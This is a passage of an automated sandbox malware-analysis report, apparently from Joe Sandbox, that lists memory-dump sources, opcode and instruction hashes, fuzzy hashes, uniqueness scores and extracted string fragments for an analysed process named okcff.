                                                            • Opcode Fuzzy Hash: b6377f977107b879111bacec632acf439f1ae1cfcccfaa79e2b768f883349c83
                                                            • Instruction Fuzzy Hash: 39E0653224811CAB8B049D45E800DBB375AABC5670B01853AB9164725DDB71DC11D7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4740165e4124c1efc8e1518dce9a0e9cd8715b555791b9d772c6f55fa7d19dfe
                                                            • Instruction ID: 0556d97dec0bb76eb79950bf2b31d908b1e45a03945c8ee4d46a0b778e3c367c
                                                            • Opcode Fuzzy Hash: 4740165e4124c1efc8e1518dce9a0e9cd8715b555791b9d772c6f55fa7d19dfe
                                                            • Instruction Fuzzy Hash: 37F0BE31E08219AFCB0ADF68D0486DDBFF2EF85314F1884AAD00997250EB340AC1CBC1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2e623efb186fec46de5a478fb2ac14ded5bb435f7b2dd2ee7dd57e5cd8634c8
                                                            • Instruction ID: 5e8a315c99babf5d3e6c9f850968981375f5dd8aad794437f263f7163bf25ce1
                                                            • Opcode Fuzzy Hash: d2e623efb186fec46de5a478fb2ac14ded5bb435f7b2dd2ee7dd57e5cd8634c8
                                                            • Instruction Fuzzy Hash: 62F027312093850FC3109B65ECA0C8BFFAADED31143098DBBD18A8B133CA30A94A8790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1462be972b34b99861eb22ee0387108163683c405d34256e4de3841f2c3d6fba
                                                            • Instruction ID: c40905d3457f8e65d23c7471bc919adc3b0fa995659593088f671813ed52945d
                                                            • Opcode Fuzzy Hash: 1462be972b34b99861eb22ee0387108163683c405d34256e4de3841f2c3d6fba
                                                            • Instruction Fuzzy Hash: 2CE04F31348124B7861C255A6849A7AE6DBA7C95A1B51047AE32ECB240CE728C0582A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a36f0e501ec0838c23e14bab1296996cfadcf1932d926c29a3bdcaf40d094a04
                                                            • Instruction ID: 39aa65a8516747a1dff2fdc7b5b6d47acf538881da002a2f03139ba4fc04b882
                                                            • Opcode Fuzzy Hash: a36f0e501ec0838c23e14bab1296996cfadcf1932d926c29a3bdcaf40d094a04
                                                            • Instruction Fuzzy Hash: 84F0DA70D0021CEF8F40EFB6C94459DBBF1BB48200F5089EAD828E3208E7344641DF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fadbf5a5f039c6de3eb3444f21a1d87028094a4b688d94ea75b0a1be8e9923d1
                                                            • Instruction ID: feb3be8bf96973267f675a6e4e79a09261c779e98cba71225a091c77fce29865
                                                            • Opcode Fuzzy Hash: fadbf5a5f039c6de3eb3444f21a1d87028094a4b688d94ea75b0a1be8e9923d1
                                                            • Instruction Fuzzy Hash: A5E04F2579C01C97030C12196414A3A658F5AC8F5132A4037E92BC7310EFB0CC0282B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b6ad95275e855e42a5920e11fe90ba39f69954e203ed4d44e28f35919b9cb8d
                                                            • Instruction ID: 67f83e955155dd7a72c06706e673d06e39b8eb86600fb441476c84b9a283ac2c
                                                            • Opcode Fuzzy Hash: 9b6ad95275e855e42a5920e11fe90ba39f69954e203ed4d44e28f35919b9cb8d
                                                            • Instruction Fuzzy Hash: F6E02B2058C36DCF832D31144490431BB654FDB214306C0A791614B182C7724C8DCFD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47a00bddb51f05de63f03809454ff9e0eacda9049ff32697188cdbea85b3c1bb
                                                            • Instruction ID: 61ca4e9e2f6ab627c5a991697e3dbe6f5035ffc098e3bec072190bb71a361dcc
                                                            • Opcode Fuzzy Hash: 47a00bddb51f05de63f03809454ff9e0eacda9049ff32697188cdbea85b3c1bb
                                                            • Instruction Fuzzy Hash: 51F0BD31A94109DFDB04EBA4E495ABEB7B2BB48204F208834D522AB394DB759945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47a00bddb51f05de63f03809454ff9e0eacda9049ff32697188cdbea85b3c1bb
                                                            • Instruction ID: 61ca4e9e2f6ab627c5a991697e3dbe6f5035ffc098e3bec072190bb71a361dcc
                                                            • Opcode Fuzzy Hash: 47a00bddb51f05de63f03809454ff9e0eacda9049ff32697188cdbea85b3c1bb
                                                            • Instruction Fuzzy Hash: 51F0BD31A94109DFDB04EBA4E495ABEB7B2BB48204F208834D522AB394DB759945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08b59a693ace2eb3d4702cf147bc8f24fb6f7e0550d4b56bb66562bc3a816038
                                                            • Instruction ID: 38bd863a5fdb49c8714dafc9fd9c0bf102ec7dc9f77cba26178d533782673ff4
                                                            • Opcode Fuzzy Hash: 08b59a693ace2eb3d4702cf147bc8f24fb6f7e0550d4b56bb66562bc3a816038
                                                            • Instruction Fuzzy Hash: EBE0D820ACC72E8F472D36145091436B6A64FDE154306C07793524A280CB718C8DCFE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b82ab51d34934185594e0d92ebdf0c4748780cf98c9cfc30380a4f78f0838dd0
                                                            • Instruction ID: 02a29dd0e16b05048a1d9594109a0ed1c379f83754ab49d4b2440c0abf98e5f4
                                                            • Opcode Fuzzy Hash: b82ab51d34934185594e0d92ebdf0c4748780cf98c9cfc30380a4f78f0838dd0
                                                            • Instruction Fuzzy Hash: 01E06D316C9769CFCF2D0A3988506BA3F266F9231531981BBD41A9A112CB734841C7D3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5143ece59f3aa1f1c9316eed0fe42362e12627b04aa840156f2780c8f2899d6
                                                            • Instruction ID: 3922845a707f0a3fb0a10c7bf84acb3363731764151476ef8103b118f95611c8
                                                            • Opcode Fuzzy Hash: a5143ece59f3aa1f1c9316eed0fe42362e12627b04aa840156f2780c8f2899d6
                                                            • Instruction Fuzzy Hash: C7E0923055E6B08FC316C334E8694B97F656F0251079D86DBD056CB6E3C6115C068B41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b61a0e4ff8852bc1bf8832f563c7ff637e2106d2118d0c36fb999b253daa04ab
                                                            • Instruction ID: 61f43a9d4665083350b8dfc0146f7d2b35d29efe484edae4357108db1bcda4ab
                                                            • Opcode Fuzzy Hash: b61a0e4ff8852bc1bf8832f563c7ff637e2106d2118d0c36fb999b253daa04ab
                                                            • Instruction Fuzzy Hash: C3F03031109228EFC719DF70D92A8E63BB7FF49301790446AE517C6220CB36DC52DB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c75afa189007a113a2017caf0321e27275236382ed4555cb2adba4216ec60486
                                                            • Instruction ID: 2e435aaeb0eb72985879acff92e5d0a9475901e8bfedcea25634d749f7d357a0
                                                            • Opcode Fuzzy Hash: c75afa189007a113a2017caf0321e27275236382ed4555cb2adba4216ec60486
                                                            • Instruction Fuzzy Hash: 57E04F30AC572EDB8F2C1A35981027A3E5B6F82215356807BC61A99210DF738C41C7D3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec5a6765414ed9e979fcf4081ffea7fd886447c6e8eaedd2c4993eac35a1dcff
                                                            • Instruction ID: 1f1e72c2c7df6d31c0616ad979ac9b941aecaab68f9bab5a96d86d23aebbbf3c
                                                            • Opcode Fuzzy Hash: ec5a6765414ed9e979fcf4081ffea7fd886447c6e8eaedd2c4993eac35a1dcff
                                                            • Instruction Fuzzy Hash: 4BE0123170420957C7109A16E894C4BF79ADED1668311CD3A911B87225DB71E9468694
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ce131e296271c9780b047814b96abfc181a78012a7a386ea09e911981f064df
                                                            • Instruction ID: fe8f28052a5f64146464bfaeeea063d4920ff770259ccf500c624a20142380d2
                                                            • Opcode Fuzzy Hash: 1ce131e296271c9780b047814b96abfc181a78012a7a386ea09e911981f064df
                                                            • Instruction Fuzzy Hash: 8DE0CD353083514FC7235738B4A01F23BE2DF8B51030445A5D489CB215DE15DD078750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0ff82887a78ea26506778ef6f9421d39261b612bb0156ebb3264e7ca5c5ee4d
                                                            • Instruction ID: bd10726cc85475f6867bfd4d973eca3242b8fae5413dcd1aeb013a189ea5cb90
                                                            • Opcode Fuzzy Hash: d0ff82887a78ea26506778ef6f9421d39261b612bb0156ebb3264e7ca5c5ee4d
                                                            • Instruction Fuzzy Hash: 5EF06D309042889FC701DFB8D1A19DDBBF1EF8A204B2046D8D448D7216D7322E26DB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d57d04d6db2acfff403ef4bfaceefb350cc53de3e63ed70ad652aa5f0e1474c8
                                                            • Instruction ID: 4e0d115f132d3c9c85bcb124c8d7aaf58a9b8efc4f5fd00985795e2d0c2893e3
                                                            • Opcode Fuzzy Hash: d57d04d6db2acfff403ef4bfaceefb350cc53de3e63ed70ad652aa5f0e1474c8
                                                            • Instruction Fuzzy Hash: 33E02230948388AFC701DF74E810AAEBBF1EF46200F0089E8D8488B102DA332F018781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c36d589d59fc58c6ba8a4b6444be5c207528a8d8fbbd87d253fcfb9d775e7c06
                                                            • Instruction ID: 9e94c10f78cfa9b61ec8bfe3ddd10850074308ccbb12ab8208b31100f330fa55
                                                            • Opcode Fuzzy Hash: c36d589d59fc58c6ba8a4b6444be5c207528a8d8fbbd87d253fcfb9d775e7c06
                                                            • Instruction Fuzzy Hash: C8C02B300CA304CFC22C02F06C09F3032B82380315F018031E81B046B04F318452C049
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 340c47c20dce054923a684f76aeefc26df557a1135ca4e863321aafd45e2b828
                                                            • Instruction ID: 00631c68f953ff5ce785cf6a3bbef234868b8c5208da6810c70cef566a574253
                                                            • Opcode Fuzzy Hash: 340c47c20dce054923a684f76aeefc26df557a1135ca4e863321aafd45e2b828
                                                            • Instruction Fuzzy Hash: D9C09B361CD244D7CA1C367054C5B75761D5751705F164065E13F45B148B77D493CEC6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37909ec34418410f0ad4218d0b37e15491f79d353385c626bf7190e36416d8d9
                                                            • Instruction ID: 0c51eaa53054958c77382dadda63118023907af0094fe91dacf3cf9632d28faf
                                                            • Opcode Fuzzy Hash: 37909ec34418410f0ad4218d0b37e15491f79d353385c626bf7190e36416d8d9
                                                            • Instruction Fuzzy Hash: 85C092350EDF88CEAA1D2669AC4AC3B36386600B0E76BC276A13B4856457B2D990C547
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4759f95e2f89a17459e40ef36f73a0fb7ac718213160c60feb6395b7ce744b43
                                                            • Instruction ID: d1a0ae81813fc86a3ab599881f2d1b31882c7c89e2deb283aaefc8ab257bdbbf
                                                            • Opcode Fuzzy Hash: 4759f95e2f89a17459e40ef36f73a0fb7ac718213160c60feb6395b7ce744b43
                                                            • Instruction Fuzzy Hash: C4B092311EC608CAC62D2161500863F721D9780208F92047B902B09E5147B69462CAEF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ae4f2f672efb8708bbf5a105ef7aa150d02ae4fdcc002c60067f070cfa3a9fb
                                                            • Instruction ID: 48f242d87a91cca6e6b025d40024eb8c60bf603efb65adc63a1cb85bf773826e
                                                            • Opcode Fuzzy Hash: 0ae4f2f672efb8708bbf5a105ef7aa150d02ae4fdcc002c60067f070cfa3a9fb
                                                            • Instruction Fuzzy Hash: 2BC0481A50E7C60ED703AAA05D61A806F326813518B8D05C3E084EA253E90C8E8A8BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 022f810b0cef1319b1f13900cc10885607ff5bc8fef74af43ea900dcb345daa0
                                                            • Instruction ID: 8da4a6259e83117cbcc747fde4ae2bb087e24410764aa55c958ef6df1aa260d3
                                                            • Opcode Fuzzy Hash: 022f810b0cef1319b1f13900cc10885607ff5bc8fef74af43ea900dcb345daa0
                                                            • Instruction Fuzzy Hash: 11C0927408CA2CCA820C5B717D09A393B29B6E1216702487E902B4AD208BB2E4A2E681
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 185f7e37731184d5ae70be23fc648e295af29308920022777be819d23cfd6d80
                                                            • Instruction ID: c4c3d43cb44b424f10842fb9970912f9c8b2876faf6d627eaa22c445cc22421f
                                                            • Opcode Fuzzy Hash: 185f7e37731184d5ae70be23fc648e295af29308920022777be819d23cfd6d80
                                                            • Instruction Fuzzy Hash: FAC04C5090FBD25FDB2397709D7A148BF716C5310130D96CFC481CE5A3D6144545D757
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 846fb5bca6410ebf83133d7d1208cb631dee6694f99f8349a84ed090fdf5745d
                                                            • Instruction ID: ed15d6b53cfa39832c76963aa5e3d488b947712bb67df8b4ae519ee0470abbcd
                                                            • Opcode Fuzzy Hash: 846fb5bca6410ebf83133d7d1208cb631dee6694f99f8349a84ed090fdf5745d
                                                            • Instruction Fuzzy Hash: 17C0481180E6D28FEB029B7048BA6943F72590320270988E68091CA0A3C049088ADB22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d20f650a9595bc73473dbf626f7a6ec3d7177d33c54e5354336fdc9fb3fa596
                                                            • Instruction ID: 6d5cdb3b46ed564f374bba720a02339f4408e77a6e82e3270c1d17a570700515
                                                            • Opcode Fuzzy Hash: 5d20f650a9595bc73473dbf626f7a6ec3d7177d33c54e5354336fdc9fb3fa596
                                                            • Instruction Fuzzy Hash: 9DB012312043190A174017B27C08637339DA5004043809471E50ED0A00F905D0104450
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56947c4b9a289f3faac098bf2a790aa9111f929ea5a4bb69b351bda6d76158ec
                                                            • Instruction ID: d05f1043a9b7d79563650bef346e2790c73c7b78faeb6d81be0c63a389adce14
                                                            • Opcode Fuzzy Hash: 56947c4b9a289f3faac098bf2a790aa9111f929ea5a4bb69b351bda6d76158ec
                                                            • Instruction Fuzzy Hash: FAB09237A05009CB8B00DB84F886CDCF774EB94226B104067D211A242087325A69CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {=$ |=$ }=$0{=$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$P{=$P|=$#i[m^$#j[m^$#k[m^$#p[m^$+e[m^$+f[m^$+g[m^$3c[m^$3i[m^$3l[m^$3n[m^$3o[m^$3p[m^$;e[m^$;f[m^$;h[m^$Cc[m^$Ci[m^$Cj[m^$Cl[m^$Cn[m^$Co[m^$Cp[m^$Kg[m^$Sd[m^$Si[m^$Sj[m^$Sk[m^$Sl[m^$Sn[m^$[e[m^$[f[m^$[h[m^$cc[m^$cd[m^$ck[m^$cl[m^$cn[m^$co[m^$cp[m^$kf[m^$kg[m^$kh[m^$sc[m^$si[m^$sj[m^$sk[m^$sl[m^$sn[m^$so[m^${=${f[m^${g[m^$|=$~=$c[m^$e[m^$f[m^$j[m^$l[m^$n[m^
                                                            • API String ID: 0-3425778499
                                                            • Opcode ID: 9fd0db56c6cce30892b64657bcf1925f86c51da4224458d140d2ebac92a3eea2
                                                            • Instruction ID: 574c3d6cb40393c09b04e97261565d68f840ef46a12a2c6ebf7d752aa078f126
                                                            • Opcode Fuzzy Hash: 9fd0db56c6cce30892b64657bcf1925f86c51da4224458d140d2ebac92a3eea2
                                                            • Instruction Fuzzy Hash: AF041331D1061A8BCF15EF60CD549E9B772FF99300F1196A6E9097B224EB706B89CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: yR$#%f$#fr$*T:O$Cvr&$Methods Assembly$T3i$[Yp{$]V|N$sJ!g$vtFp$i
                                                            • API String ID: 0-2312584447
                                                            • Opcode ID: 104f7408cfed895c77dcc76d57f3db0caacf19e6f05041ec79f2e2e58167115c
                                                            • Instruction ID: 0311a7d50232a0d35a53ef363ab2615bb63f4016806807dba23621958f9eb015
                                                            • Opcode Fuzzy Hash: 104f7408cfed895c77dcc76d57f3db0caacf19e6f05041ec79f2e2e58167115c
                                                            • Instruction Fuzzy Hash: D843D231D5072B8ADB119F608C44AC9F372FFA6304F219785A9493B145EBB16BDACF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
